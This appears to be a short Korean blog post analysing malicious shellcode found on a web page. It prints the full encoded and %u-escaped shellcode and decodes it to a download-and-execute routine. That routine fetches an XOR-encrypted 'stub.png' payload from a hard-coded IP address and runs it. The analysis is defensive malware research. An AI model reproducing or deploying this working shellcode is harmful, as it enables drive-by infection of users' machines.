기존 제가 올린글 링크입니다.
실행되는 코드는 다음과 같습니다.
Data5756Data3352Data64C9Data718BData8B30Data0C76Data768BData8B1CData085EData7E8BData8B20Data8136Data0C7FData0033Data0032DataEF75Data5F5ADataE95EData0243Data0000Data8959Data00A9Data0002Data8900Data04B9Data0002Data8900Data08B1Data0002Data8B00Data8BE9Data6AFDData590CDataDDE8Data0001DataE200Data8BF9Data0055DataC283DataEB05Data5B21Data4D8DData68FBData6E6FData0000Data7568Data6C72Data546DData8B51Data55FFDataEC8BData01C6Data8968Data0159Data41C6DataC305DataE2FFDataDAE8DataFFFFData8BFFData6AD8Data5901DataA3E8Data0001DataE200Data68F9Data0100Data0000Data858DData0101Data0000DataC750Data4085Data0002Data2500Data5041DataC750Data4485Data0002Data4400Data5441DataC741Data4885Data0002Data2500Data005CData8D00Data4085Data0002Data5000Data55FFData482CData8589Data00FCData0000Data84C7Data0105Data0001Data7500Data6470DataC761Data0584Data0105Data0000Data6574Data652EData84C7Data0905Data0001Data7800Data0065Data8B00Data3055DataC283DataEB05Data5B26Data4D8DData33FBData56F6Data8D56Data0185Data0001Data5000Data458DData5034Data5156DataFF8BData8B55DataC6ECData6801Data5989DataC601Data0541DataFFC3DataE8E2DataFFD5DataFFFFData006AData8068Data0000Data6A00Data6A03Data6A00Data6801Data01FFData001FData858DData0101Data0000DataFF50Data1455DataC00BData840FData00D4Data0000Data8589Data0230Data0000Data006AData006AData006ADataFF50Data1855Data006AData858BData0230Data0000DataFF50Data2855Data8589Data0234Data0000Data006AData858DData0238Data0000Data8B50Data3485Data0002Data5000Data858DData0260Data0000Data8B50Data3085Data0002Data5000Data55FFData8D20Data60BDData0002Data8B00Data348DData0002Data8000Data0F34Data4995DataF975Data3780Data6A95Data6A00Data6A00Data8B00Data3085Data0002Data5000Data55FFData6A18Data8D00Data3885Data0002Data5000Data858BData0234Data0000Data8D50Data6085Data0002Data5000Data858BData0230Data0000DataFF50Data2455Data858BData0230Data0000DataFF50Data1C55Data558BData8308Data05C2Data33EBData8D5BDataFB4DData8B56DataFC85Data0000DataC600Data0085Data0001Data2200Data84C6Data0B05Data0001Data2200Data858DData0100Data0000Data5150DataFF8BData8B55DataC6ECData6801Data5989DataC601Data0541DataFFC3DataE8E2DataFFC8DataFFFFDataAD8BData0200Data0000DataBD8BData0204Data0000DataB58BData0208Data0000DataE58BDataC033Data335DDataC3DBData5551Data738BData8B3CData1E74Data0378Data56F3Data768BData0320Data33F3Data49C9DataAD41DataC303DataED33DataBE0FData3A10Data74D6DataC108Data07CDDataEA03DataEB40Data3BF1Data752FData5EE7Data6E8BData0324Data66EBData4C8BData004DData6E8BData031CData8BEBData8D44Data0300DataABC3Data595DDataE8C3DataFDB8DataFFFFData7432Data0C91DataE239Data837DData2F51Data01A2Data65A0DataCB97Data8963Data4FD1Data3293Data94E4DataBE43DataDBACData6657DataFF0DData36B2Data130FData8DC4Data741FData138EDataAC0AData730DDataFD1BDataD680Data9AAFData7468Data7074Data2F3AData312FData322EData3433Data382EData2E33Data3137Data642FData7461Data6461Data7461Data6461Data7461Data6461Data7461Data6461Data7461Data2F61Data7473Data6275Data702EData676EData0000Data0000
이를 해석하면 다음과 같은 코드가 됩니다.
%u5756%u3352%u64C9%u718B%u8B30%u0C76%u768B%u8B1C%u085E%u7E8B%u8B20%u8136%u0C7F%u0033%u0032%uEF75%u5F5A%uE95E%u0243%u0000%u8959%u00A9%u0002%u8900%u04B9%u0002%u8900%u08B1%u0002%u8B00%u8BE9%u6AFD%u590C%uDDE8%u0001%uE200%u8BF9%u0055%uC283%uEB05%u5B21%u4D8D%u68FB%u6E6F%u0000%u7568%u6C72%u546D%u8B51%u55FF%uEC8B%u01C6%u8968%u0159%u41C6%uC305%uE2FF%uDAE8%uFFFF%u8BFF%u6AD8%u5901%uA3E8%u0001%uE200%u68F9%u0100%u0000%u858D%u0101%u0000%uC750%u4085%u0002%u2500%u5041%uC750%u4485%u0002%u4400%u5441%uC741%u4885%u0002%u2500%u005C%u8D00%u4085%u0002%u5000%u55FF%u482C%u8589%u00FC%u0000%u84C7%u0105%u0001%u7500%u6470%uC761%u0584%u0105%u0000%u6574%u652E%u84C7%u0905%u0001%u7800%u0065%u8B00%u3055%uC283%uEB05%u5B26%u4D8D%u33FB%u56F6%u8D56%u0185%u0001%u5000%u458D%u5034%u5156%uFF8B%u8B55%uC6EC%u6801%u5989%uC601%u0541%uFFC3%uE8E2%uFFD5%uFFFF%u006A%u8068%u0000%u6A00%u6A03%u6A00%u6801%u01FF%u001F%u858D%u0101%u0000%uFF50%u1455%uC00B%u840F%u00D4%u0000%u8589%u0230%u0000%u006A%u006A%u006A%uFF50%u1855%u006A%u858B%u0230%u0000%uFF50%u2855%u8589%u0234%u0000%u006A%u858D%u0238%u0000%u8B50%u3485%u0002%u5000%u858D%u0260%u0000%u8B50%u3085%u0002%u5000%u55FF%u8D20%u60BD%u0002%u8B00%u348D%u0002%u8000%u0F34%u4995%uF975%u3780%u6A95%u6A00%u6A00%u8B00%u3085%u0002%u5000%u55FF%u6A18%u8D00%u3885%u0002%u5000%u858B%u0234%u0000%u8D50%u6085%u0002%u5000%u858B%u0230%u0000%uFF50%u2455%u858B%u0230%u0000%uFF50%u1C55%u558B%u8308%u05C2%u33EB%u8D5B%uFB4D%u8B56%uFC85%u0000%uC600%u0085%u0001%u2200%u84C6%u0B05%u0001%u2200%u858D%u0100%u0000%u5150%uFF8B%u8B55%uC6EC%u6801%u5989%uC601%u0541%uFFC3%uE8E2%uFFC8%uFFFF%uAD8B%u0200%u0000%uBD8B%u0204%u0000%uB58B%u0208%u0000%uE58B%uC033%u335D%uC3DB%u5551%u738B%u8B3C%u1E74%u0378%u56F3%u768B%u0320%u33F3%u49C9%uAD41%uC303%uED33%uBE0F%u3A10%u74D6%uC108%u07CD%uEA03%uEB40%u3BF1%u752F%u5EE7%u6E8B%u0324%u66EB%u4C8B%u004D%u6E8B%u031C%u8BEB%u8D44%u0300%uABC3%u595D%uE8C3%uFDB8%uFFFF%u7432%u0C91%uE239%u837D%u2F51%u01A2%u65A0%uCB97%u8963%u4FD1%u3293%u94E4%uBE43%uDBAC%u6657%uFF0D%u36B2%u130F%u8DC4%u741F%u138E%uAC0A%u730D%uFD1B%uD680%u9AAF%u7468%u7074%u2F3A%u312F%u322E%u3433%u382E%u2E33%u3137%u642F%u7461%u6461%u7461%u6461%u7461%u6461%u7461%u6461%u7461%u2F61%u7473%u6275%u702E%u676E%u0000%u0000
이를 다시 분석하면 다음처럼 png 파일을 다운로드 하는 코드가 됩니다.
http://1.234.83.71/datadatadatadatadata/stub.png
내용이 xor로 암호화 되어 있어 조금더 봐야하겠지만, 일단 다운로드 후 실행하는 코드가 맞기때문에
악성코드가 활실한것으로 보여집니다.
암호화 푼 후 백신에 돌려보겠습니다.